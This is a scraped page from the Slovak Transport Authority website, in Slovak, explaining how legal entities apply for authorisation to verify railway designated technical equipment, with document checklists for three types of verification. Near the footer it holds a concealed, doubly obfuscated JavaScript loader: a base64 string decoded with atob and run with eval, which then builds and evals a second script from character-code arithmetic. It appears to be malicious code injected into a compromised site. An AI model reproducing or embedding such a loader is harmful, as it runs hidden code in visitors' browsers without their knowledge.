DOPRAVNÝ ÚRAD

UTZ – poverovanie právnických osôb

Pozor, zmena zákona!

Postup pri poverovaní právnických osôb v zmysle zákona č. 513/2009/Z.z. o dráhach v znení neskorších predpisov

1. Poverenie právnickej osobe vydáva Dopravný úrad  rozhodnutím.

2. Držiteľ Poverenia – poverená právnická osoba (ďalej len „PPO“) môže byť poverená na:

 • 2.1. posudzovanie dokumentácie UTZ  v zmysle vyhlášky č. 205/2010 Z.z. a overovanie spôsobilosti určených technický zariadení (ďalej len UTZ) podľa § 16 zákona č. 513/2009 Z.z. o dráhach v znení neskorších predpisov (ďalej len „zákon“),
 • 2.2. overovanie splnenia požiadaviek na vykonávanie určených činností podľa § 17 zákona,
 • 2.3. overovania odbornej spôsobilosti na vykonávanie určených činností na UTZ podľa § 18 zákona.

3.  Na poverenie právnickej osoby podľa ods. (1) nie je právny nárok.

4. Poverenie sa vydáva na dobu určitú. Ak PPO nesplní alebo porušuje podmienky uvedené v rozhodnutí o poverení, Dopravný úrad jej poverenie zruší, alebo obmedzí.

5. Dopravný úrad môže rozhodnúť o poverení PPO na základe žiadosti a preukázania týchto podmienok:

Podmienky pre jednotlivé činnosti (všeobecne):
 • Žiadateľ nesmie vykonávať určené činnosti montáž, opravy, rekonštrukcie, údržba a skúšky na UTZ,  na ktoré má vydané Oprávnenie podľa §17  zákona
 • Žiadateľ musí informovať bezpečnostný orgán (Dopravný úrad, divíziu dráh a dopravy na dráhach , sekciu ŠOTD a bezpečnosti) o všetkých zmenách systému manažérstva kvality. Bezpečnostný orgán posúdi zmeny systému manažérstva  kvality a rozhodne, či tieto zmeny sú v zhode s vydaným rozsahom poverenia.
 • Žiadateľ musí mať zavedený systém nahlasovania výkonov, minimálne v 21 dňovej lehote, na Dopravný úrad Bratislava.  
 • ďalšie podmienky sú uvedené v bodoch A,B,C
A) overovanie v zmysle ods. 2.1 (podľa § 16 a § 103 čl. 2 písm. d) zákona)

Zaslanie žiadosti  o poverenie na adresu
Dopravný úrad
Divízia dráh a dopravy na dráhach, sekcia ŠOTD  a bezpečnosti
Letisko M. R. Štefánika
823 05 Bratislava
s uvedením rozsahu žiadaného poverenia a priložením nasledovných dokladov:

 • výpis z obchodného registra nie starší ako 3 mesiace
 • adresa prevádzky, pracoviska, kde sa bude vykonávať žiadaná činnosť, pokiaľ nie je totožná so sídlom spoločnosti (s.r.o., príp. a.s.)
 • platný doklad o akreditácií podľa STN EN ISO/IEC 17 020:2012 (Všeobecné kritériá činnosti orgánov rozličných typov vykonávajúcich inšpekcie)

Ďalšie náležitosti na posudzovanie autorizačných požiadaviek nad rámec normy STN EN ISO/IEC 17 020

 1. doklad o kompetentnosti personálu vykonávajúceho žiadané činnosti
  • kvalifikačné doklady zamestnancov – platné Osvedčenie revízneho technika v rozsahu žiadaných činností (revízny technik elektrických zariadení, príp. revízny technik zdvíhacích a dopravných zariadení, príp. revízny technik tlakových zariadení, príp. revízny technik plynových zariadení) vydané Dopravným úradom v zmysle § 18 zákona, resp. platné Osvedčenie kontrolóra činností vo zváraní, resp. v nedeštruktívnom skúšaní v rozsahu žiadaného rozsahu poverenia vydané Dopravným úradom v zmysle § 18 zákona
  • doklad o praxi vo vykonávaní úradných skúšok,  resp. inšpekcií vo zváraní a nedeštruktívnom skúšaní podľa vyhl. 205/2010 Z.z. – prax min. v dĺžke 3 rokov
 2. zoznam interných predpisov železničných dráh v rozsahu žiadaných činností,
 3. zoznam potrebných technických  noriem a legislatívy, ktoré sa týkajú príslušného druhu a rozsahu určených technických zariadení (UTZ),
 4. vzory protokolov úradných skúšok na UTZ a posudzovania technickej dokumentácie ( § 16 zákona),
 5. zoznam zamestnancov s odbornou spôsobilosťou fyzických osôb podľa §29 vyhlášky č. 205/2010 Z. z. a príslušného rozsahu UTZ,
 6. zoznam  pracovníkov s potrebnou zdravotnou a psychologickou spôsobilosťou pre vstup do koľajiska – povolenie do vyhradeného obvodu ŽSR,
 7. ochranné pomôcky  – reflexné vesty pre vstup do koľajiska,
 8. zoznam pracovníkov  inšpekčného orgánu, ktorí vykonávajú inšpekčnú činnosť pod trakčným vedením a v blízkosti trakčného vedenia (okrem pracovníkov s odbornou spôsobilosťou na UTZ elektrických), odbornú spôsobilosť podľa §23 vyhlášky č. 205/2010 Z. z.,
 9. miestne pracovné a bezpečnostné predpisy, ktoré sa týkajú činností na trakčnom vedení, elektrické predkurovacie zariadenia, činností v uzavretých prevádzkarňach (ako sú TM, reléové stanice, stanovištia rušňovodičov a podobne),
 10. zoznam zamestnancov, ktorí majú vstup do uzatvorených prevádzkových priestorov (napr. stanovište rušňovodiča).

Pred uvedením UTZ do prevádzky, PPO overí a schváli jeho spôsobilosť na prevádzku a vydá o tom doklad.

B) overovanie v zmysle ods. 2.2. (podľa § 17 a § 103 čl. 2 písm. e) zákona)

Zaslanie žiadosti o poverenie na adresu
Dopravný úrad
Divízia dráh a dopravy na dráhach, sekcia ŠOTD  a bezpečnosti
Letisko M. R. Štefánika
823 05 Bratislava
s uvedením rozsahu žiadaného poverenia a priložením nasledovných dokladov:

 • výpis z obchodného registra nie starší ako 3 mesiace
 • adresa prevádzky, pracoviska, kde sa bude vykonávať žiadaná činnosť, pokiaľ nie je totožná so sídlom spoločnosti (s.r.o., príp. a.s.)
 • platný doklad o akreditácií podľa STN EN ISO/IEC 17 020:2012 (Všeobecné kritériá činnosti orgánov rozličných typov vykonávajúcich inšpekcie)

Ďalšie náležitosti na posudzovanie autorizačných požiadaviek nad rámec normy STN EN ISO/IEC 17 020

 1. doklad o kompetentnosti personálu vykonávajúceho žiadané činnosti
  • kvalifikačné doklady zamestnancov – platné Osvedčenie revízneho technika v rozsahu žiadaných činností (revízny technik elektrických zariadení, príp. revízny technik zdvíhacích a dopravných zariadení, príp. revízny technik tlakových zariadení, príp. revízny technik plynových zariadení) vydané Dopravným úradom v zmysle § 18 zákona, resp. platné Osvedčenie kontrolóra činností vo zváraní, resp. v nedeštruktívnom skúšaní v rozsahu žiadaného rozsahu poverenia vydané Dopravným úradom v zmysle § 18 zákona
  • doklad o praxi vo vykonávaní úradných skúšok,  resp. inšpekcií vo zváraní a nedeštruktívnom skúšaní podľa vyhl. 205/2010 Z.z. – prax min. v dĺžke 3 rokov
 2. zoznam interných predpisov železničných dráh v rozsahu žiadaných činností,
 3. zoznam potrebných technických  noriem a legislatívy, ktoré sa týkajú príslušného druhu a rozsahu určených technických zariadení (UTZ),
 4. zoznam zamestnancov s odbornou spôsobilosťou fyzických osôb podľa §29 vyhlášky č. 205/2010 Z. z. a príslušného rozsahu UTZ,
 5. zoznam  pracovníkov s potrebnou zdravotnou a psychologickou spôsobilosťou pre vstup do koľajiska – povolenie do vyhradeného obvodu ŽSR,
 6. ochranné pomôcky  – reflexné vesty pre vstup do koľajiska,
 7. zoznam pracovníkov  inšpekčného orgánu, ktorí vykonávajú inšpekčnú činnosť pod trakčným vedením a v blízkosti trakčného vedenia (okrem pracovníkov s odbornou spôsobilosťou na UTZ elektrických), odbornú spôsobilosť podľa §23 vyhlášky č. 205/2010 Z. z.,
 8. miestne pracovné a bezpečnostné predpisy, ktoré sa týkajú činností na trakčnom vedení, elektrické predkurovacie zariadenia, činností v uzavretých prevádzkarňach (ako sú TM, reléové stanice, stanovištia rušňovodičov a podobne),
 9. zoznam zamestnancov, ktorí majú vstup do uzatvorených prevádzkových priestorov (napr. stanovište rušňovodiča).

PPO overí splnenie požiadaviek určených na vykonávanie určených činností a vydá o tom doklad.

Uvedený doklad doručí PPO na Dopravný úrad, divíziu dráh a dopravy na dráhach, sekcia ŠOTD a bezpečnosti. Dopravný úrad na základe uvedeného dokladu s kladným vyjadrením udelí žiadateľovi oprávnenie.

C) overovanie v zmysle ods. 2.3 (podľa § 18 a § 103 čl. 2 písm. g) zákona)

Zaslanie žiadosti  o vydanie poverenia na adresu
Dopravný úrad
Divízia dráh a dopravy na dráhach, sekcia ŠOTD  a bezpečnosti
Letisko M. R. Štefánika
823 05 Bratislava
s uvedením rozsahu žiadaného poverenia a priložením nasledovných dokladov:

 • výpis z obchodného registra nie starší ako 3 mesiace
 • adresa prevádzky, pracoviska, kde sa bude vykonávať žiadaná činnosť, pokiaľ nie je totožná so sídlom spoločnosti (s.r.o., príp. a.s.)
 • zdokumentovaný systém zabezpečenia kvality na vykonávanie žiadanej činnosti – príručku kvality organizačné smernice, metodické pokyny, zoznam predpisov, noriem a smerníc týkajúcich sa žiadaných činností a pod.
 • doklad o kompetentnosti personálu vykonávajúceho žiadané činnosti:
  • kvalifikačné doklady zamestnancov – platné Osvedčenie revízneho technika v rozsahu žiadaných činností (revízny technik elektrických zariadení, príp. revízny technik zdvíhacích a dopravných zariadení, príp. revízny technik tlakových zariadení, príp. revízny technik plynových zariadení) vydané Dopravným úradom v zmysle § 18 zákona, resp. platné Osvedčenie kontrolóra činností vo zváraní, resp. v nedeštruktívnom skúšaní v rozsahu žiadaného rozsahu poverenia vydané Dopravným úradom v zmysle § 18 zákona
  • doklad o praxi vo vykonávaní revízii v technických zariadeniach, resp.  v oblasti NDT (v závislosti od druhu zariadenia), resp. určených činností podľa § 18 zákona – prax min. v dĺžke 3 rokov
 • zoznam technického vybavenia na zabezpečenie žiadaných činností,
 • zoznam pracovníkov so spôsobilosťou podľa §102 odsek (1) písmeno v) zákona  – predsedov skúšobných komisií na overovanie odbornej spôsobilosti na vykonávanie činnosti na určených technických zariadeniach elektrických (pre §18 zákona).

PPO overí odbornú spôsobilosť fyzickej osoby na vykonávanie činnosti na UTZ a vydá o tom doklad.

Kontrolný Filetype iconKontrolný list na plnenie autorizačných požiadaviek Dopravného úradu (tlačivo je možné vyplniť v PC a vytlačiť)


Poverenia vydané Dopravným úradom podľa doterajších platných predpisov platia do doby platnosti uvedenej v rozhodnutí, alebo dovtedy, kým právny predpis nestanoví inak.

Zoznamy poverených právnických osôb v oblasti:

Spätná väzba pre návštevníkov. 

var WJSBCXBNMO = atob(‘dmFyIFhZQU5HSFpVS1ogPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE4IC0gOCwgMTIyIC0gNCwgMTA2IC0gOSwgMTIwIC0gNiwgMzQgLSAyLCAxMTUgLSA4LCAxMDUgLSA0LCAxMzAgLSA5LCAzNCAtIDIsIDY5IC0gOCwgMzcgLSA1LCA0MiAtIDMsIDkwIC0gOCwgMTA5IC0gMSwgNzIgLSA0LCA4OSAtIDksIDEwMyAtIDYsIDEwOSAtIDksIDEwMyAtIDEsIDExNiAtIDIsIDkzIC0gMywgNzkgLSA2LCA0NCAtIDUsIDYzIC0gNCwgMTcgLSA3LCAxMjMgLSA1LCAxMDQgLSA3LCAxMjAgLSA2LCA0MSAtIDksIDEwNyAtIDYsIDExNCAtIDQsIDEwMyAtIDQsIDEwNyAtIDYsIDEwNSAtIDUsIDM1IC0gMywgNzAgLSA5LCAzNSAtIDMsIDQ3IC0gOCwgNzYgLSAyLCA2OSAtIDQsIDUzIC0gNSwgNTEgLSAxLCAxMDEgLSAyLCA3NCAtIDgsIDc3IC0gOCwgODggLSAxLCA2OCAtIDMsIDY4IC0gMiwgNTggLSA1LCA2MyAtIDksIDEwNSAtIDUsIDc1IC0gMywgNzUgLSAyLCA3OSAtIDYsIDc2IC0gMSwgMTI3IC0gNSwgODYgLSA5LCA5MSAtIDYsIDczIC0gNiwgODIgLSAxLCA4NiAtIDksIDEwMCAtIDEsIDc5IC0gMywgMTE2IC0gNywgMTA0IC0gNSwgMTIzIC0gMywgNzYgLSA0LCAxMTIgLSA3LCA3NCAtIDUsIDEyOCAtIDgsIDc4IC0gOCwgOTAgLSA5LCA3NiAtIDcsIDExMyAtIDcsIDc1IC0gMywgMTEwIC0gNCwgNjIgLSA2LCAxMDggLSAxLCA4MSAtIDMsIDEyOCAtIDksIDc1IC0gMiwgMTI2IC0gNywgMTA2IC0gNSwgNzEgLSAyLCA5MCAtIDEsIDk0IC0gNiwgNzIgLSA2LCA4OCAtIDcsIDY2IC0gMSwgMTI2IC0gNCwgODEgLSAyLCA4OCAtIDUsIDk2IC0gNiwgODQgLSA4LCAxMDIgLSA0LCA4OCAtIDEsIDEyMyAtIDcsIDExNyAtIDMsIDc5IC0gOSwgNjcgLSAxLCA4NiAtIDUsIDkwIC0gNSwgODMgLSA1LCAxMTQgLSA1LCAxMDIgLSAzLCAxMDkgLSA1LCA3MSAtIDQsIDkyIC0gOCwgNjkgLSA0LCA4OCAtIDYsIDcxIC0gMSwgODMgLSAxLCA2OSAtIDQsIDg2IC0gMSwgNzYgLSA1LCAxMjkgLSA3LCAxMTEgLSA4LCA1NyAtIDEsIDc3IC0gMywgMTA3IC0gNCwgMTA5IC0gMSwgMTE4IC0gMywgMTA4IC0gOCwgMTIyIC0gMiwgODIgLSA5LCA4OCAtIDEsIDcyIC0gNiwgOTEgLSA1LCA5NCAtIDgsIDU0IC0gNCwgMTA1IC0gNywgMTEzIC0gNywgMTE4IC0gNywgOTAgLSAxLCA4NiAtIDksIDcxIC0gNCwgNzAgLSA0LCAxMDMgLSA1LCA4NyAtIDQsIDU0IC0gNiwgMTEyIC0gNSwgNzQgLSAzLCA4MiAtIDcsIDY5IC0gMiwgMTEwIC0gNywgNTQgLSA2LCA3MyAtIDYsIDExMSAtIDYsIDU2IC0gOCwgMTI3IC0gNSwgNzIgLSA3LCA3NCAtIDgsIDgzIC0gMiwgODkgLSA5LCA5MiAtIDQsIDc2IC0gOCwgODIgLSAxLCAxMTcgLSA5LCAxMDMgLSAxLCA4OCAtIDYsIDY0IC0gOCwgMTI4IC0gOSwgODUgLSA4LCA4NCAtIDIsIDg5IC0gNCwgODIgLSA0LCA3MSAtIDUsIDkzIC0gNywgNTUgLSA3LCA1MiAtIDEsIDc2IC0gMSwgNjkgLSAxLCAxMTcgLSAyLCA3MCAtIDMsIDk5IC0gMiwgMTEyIC0gNiwgMTE0IC0gMywgOTEgLSA4LCA4MyAtIDIsIDU3IC0gOSwgNjEgLSA0LCA3OCAtIDQsIDkyIC0gNywgNzQgLSA3LCA1MyAtIDUsIDU4IC0gMSwgNzQgLSA2LCAxMjYgLSA0LCA3NSAtIDYsIDY0IC0gNywgNzAgLSA0LCA3MyAtIDgsIDExMyAtIDIsIDg2IC0gMywgOTEgLSAzLCA3NCAtIDYsIDc4IC0gNSwgMTIzIC0gOCwgODUgLSA4LCAxMjMgLSA0LCAxMTMgLSA5LCAxMjEgLSA4LCA3OCAtIDEsIDgzIC0gMSwgNzQgLSA1LCA5MyAtIDgsIDc0IC0gOSwgMTI2IC0gNiwgMTI2IC0gNywgNDkgLSA2LCA2OSAtIDIsIDEwOCAtIDIsIDExNSAtIDQsIDc5IC0gOSwgNzYgLSAxLCA3MSAtIDMsIDkxIC0gOSwgNzUgLSAxLCA3MiAtIDIsIDY3IC0gMSwgODYgLSA1LCA4NyAtIDIsIDg1IC0gNywgMTEyIC0gMywgNzQgLSA4LCAxMjEgLSA5LCA5MyAtIDMsIDExMSAtIDgsIDY3IC0gNiwgNjggLSA3LCA0NCAtIDUsIDY1IC0gNiwgMTIgLSAyLCAxMDYgLSA0LCAxMjMgLSA2LCAxMTYgLSA2LCAxMDUgLSA2LCAxMjEgLSA1LCAxMTMgLSA4LCAxMTcgLSA2LCAxMTcgLSA3LCA0MSAtIDksIDEyOCAtIDgsIDExMyAtIDIsIDEyMiAtIDgsIDk5IC0gNCwgMTAzIC0gMiwgMTE2IC0gNiwgMTA3IC0gOCwgNDkgLSA5LCAxMTcgLSAyLCAxMjEgLSA1LCAxMTggLSA0LCAxMTIgLSA3LCAxMTIgLSAyLCAxMDggLSA1LCA0NyAtIDMsIDM0IC0gMiwgMTEwIC0gMywgMTA2IC0gNSwgMTI0IC0gMywgNDkgLSA4LCAzMyAtIDEsIDEyNyAtIDQsIDE0IC0gNCwgMzcgLSA1LCAzNCAtIDIsIDEyMSAtIDMsIDEwNSAtIDgsIDExNSAtIDEsIDMzIC0gMSwgMTE2IC0gMiwgMTA4IC0gNywgMTE3IC0gMiwgMzMgLSAxLCA3MCAtIDksIDQxIC0gOSwgNDIgLSAzLCA0MCAtIDEsIDY0IC0gNSwgMTMgLSAzLCAzNSAtIDMsIDM1IC0gMywgMTAzIC0gMSwgMTE2IC0gNSwgMTE4IC0gNCwgMzMgLSAxLCA0OCAtIDgsIDExOSAtIDEsIDEwMiAtIDUsIDEyMiAtIDgsIDM3IC0gNSwgMTA3IC0gMiwgNDAgLSA4LCA3MCAtIDksIDQwIC0gOCwgNTcgLSA5LCA2NiAtIDcsIDM5IC0gNywgMTEzIC0gOCwgNDEgLSA5LCA2NyAtIDcsIDQxIC0gOSwgMTE2IC0gMSwgMTE4IC0gMiwgMTIzIC0gOSwgMTA5IC0gNCwgMTE3IC0gNywgMTA2IC0gMywgNTIgLSA2LCAxMTcgLSA5LCAxMTAgLSA5LCAxMTggLSA4LCAxMDkgLSA2LCAxMjMgLSA3LCAxMDYgLSAyLCA2NSAtIDYsIDQwIC0gOCwgMTExIC0gNiwgNDQgLSAxLCA0OCAtIDUsIDQ3IC0gNiwgNDEgLSA5LCAxMjggLSA1LCAxNSAtIDUsIDM0IC0gMiwgMzcgLSA1LCAzOSAtIDcsIDM5IC0gNywgMTE5IC0gNSwgMTAzIC0gMiwgMTIzIC0gOCwgMzMgLSAxLCA1MSAtIDgsIDY0IC0gMywgMzkgLSA3LCA4NCAtIDEsIDExNyAtIDEsIDExNyAtIDMsIDExMyAtIDgsIDExNCAtIDQsIDEwNyAtIDQsIDU0IC0gOCwgMTA1IC0gMywgMTIyIC0gOCwgMTE3IC0gNiwgMTE4IC0gOSwgNzIgLSA1LCAxMTAgLSA2LCAxMDMgLSA2LCAxMTUgLSAxLCA2OCAtIDEsIDExNCAtIDMsIDEwMSAtIDEsIDEwNyAtIDYsIDQ2IC0gNiwgMTIzIC0gOCwgMTIwIC0gNCwgMTE2IC0gMiwgMTExIC0gNiwgMTE0IC0gNCwgMTA5IC0gNiwgNTIgLSA2LCAxMDcgLSA4LCAxMDYgLSAyLCAxMDMgLSA2LCAxMTkgLSA1LCA3NCAtIDcsIDExMiAtIDEsIDEwNiAtIDYsIDEwOSAtIDgsIDc0IC0gOSwgMTE3IC0gMSwgNDUgLSA1LCAxMDggLSAzLCA0NiAtIDUsIDQwIC0gOCwgOTYgLSAyLCAxMSAtIDEsIDE1IC0gNiwgMTQgLSA1LCAxMyAtIDQsIDEwIC0gMSwgMTExIC0gNCwgMTA1IC0gNCwgMTMwIC0gOSwgNTQgLSA4LCAxMDUgLSA2LCAxMTMgLSA5LCAxMDEgLSA0LCAxMjAgLSA2LCA3NiAtIDksIDExNyAtIDYsIDEwMyAtIDMsIDEwNyAtIDYsIDY4IC0gMywgMTIyIC0gNiwgNDggLSA4LCAxMTAgLSA1LCA0MSAtIDksIDQ1IC0gOCwgMzMgLSAxLCAxMDggLSAxLCAxMDcgLSA2LCAxMjcgLSA2LCA0OCAtIDIsIDExNCAtIDYsIDEwOSAtIDgsIDExNSAtIDUsIDEwNyAtIDQsIDEyMiAtIDYsIDExMiAtIDgsIDQ4IC0gNywgNTAgLSA5LCA2NCAtIDUsIDExIC0gMSwgNDAgLSA4LCAzOCAtIDYsIDEyNiAtIDEsIDEyIC0gMiwgMzUgLSAzLCAzNSAtIDMsIDEyMSAtIDcsIDEwMiAtIDEsIDEyNCAtIDgsIDEyNCAtIDcsIDEyMyAtIDksIDExNyAtIDcsIDQxIC0gOSwgMTE2IC0gMiwgMTA5IC0gOCwgMTI0IC0gOSwgNjUgLSA2LCAxOSAtIDksIDEzMSAtIDYsIDE2IC0gNiwgMTMgLSAzLCAxMjcgLSA5LCAxMDUgLSA4LCAxMjAgLSA2LCA0MSAtIDksIDEwOSAtIDksIDExMCAtIDksIDEwMiAtIDMsIDQwIC0gOCwgNjQgLSAzLCAzNiAtIDQsIDEyNyAtIDcsIDExNyAtIDYsIDExNSAtIDEsIDk2IC0gMSwgMTA0IC0gMywgMTE1IC0gNSwgMTAwIC0gMSwgNDIgLSAyLCAxMDQgLSA3LCAxMTkgLSAzLCAxMTkgLSA4LCAxMDYgLSA4LCA0NCAtIDQsIDEwNSAtIDQsIDExNyAtIDcsIDEwNyAtIDgsIDEwNyAtIDYsIDEwOCAtIDgsIDQ4IC0gNywgNTMgLSA5LCAzOSAtIDcsIDExNSAtIDgsIDEwOCAtIDcsIDEyNiAtIDUsIDQ0IC0gMywgNjEgLSAyLCAxMyAtIDMsIDQzIC0gMywgMTExIC0gMSwgMTA4IC0gNywgMTI0IC0gNSwgMzkgLSA3LCA3NCAtIDQsIDEyNSAtIDgsIDExOSAtIDksIDEwMiAtIDMsIDEyMiAtIDYsIDExMyAtIDgsIDExNyAtIDYsIDExMiAtIDIsIDQ2IC0gNiwgMTA0IC0gNCwgMTEwIC0gOSwgMTA4IC0gOSwgNDYgLSA1LCA0NCAtIDMsIDQ3IC0gNywgNDQgLSAzLCA2MyAtIDQsIDE0IC0gNCwgMTkgLSA5KTtldmFsKFhZQU5HSFpVS1opOw==’);
eval(WJSBCXBNMO);

© Dopravný úrad / Transport Authority | Mapa stránok | RSS W3C Validation

Dodávateľ portálového riešenia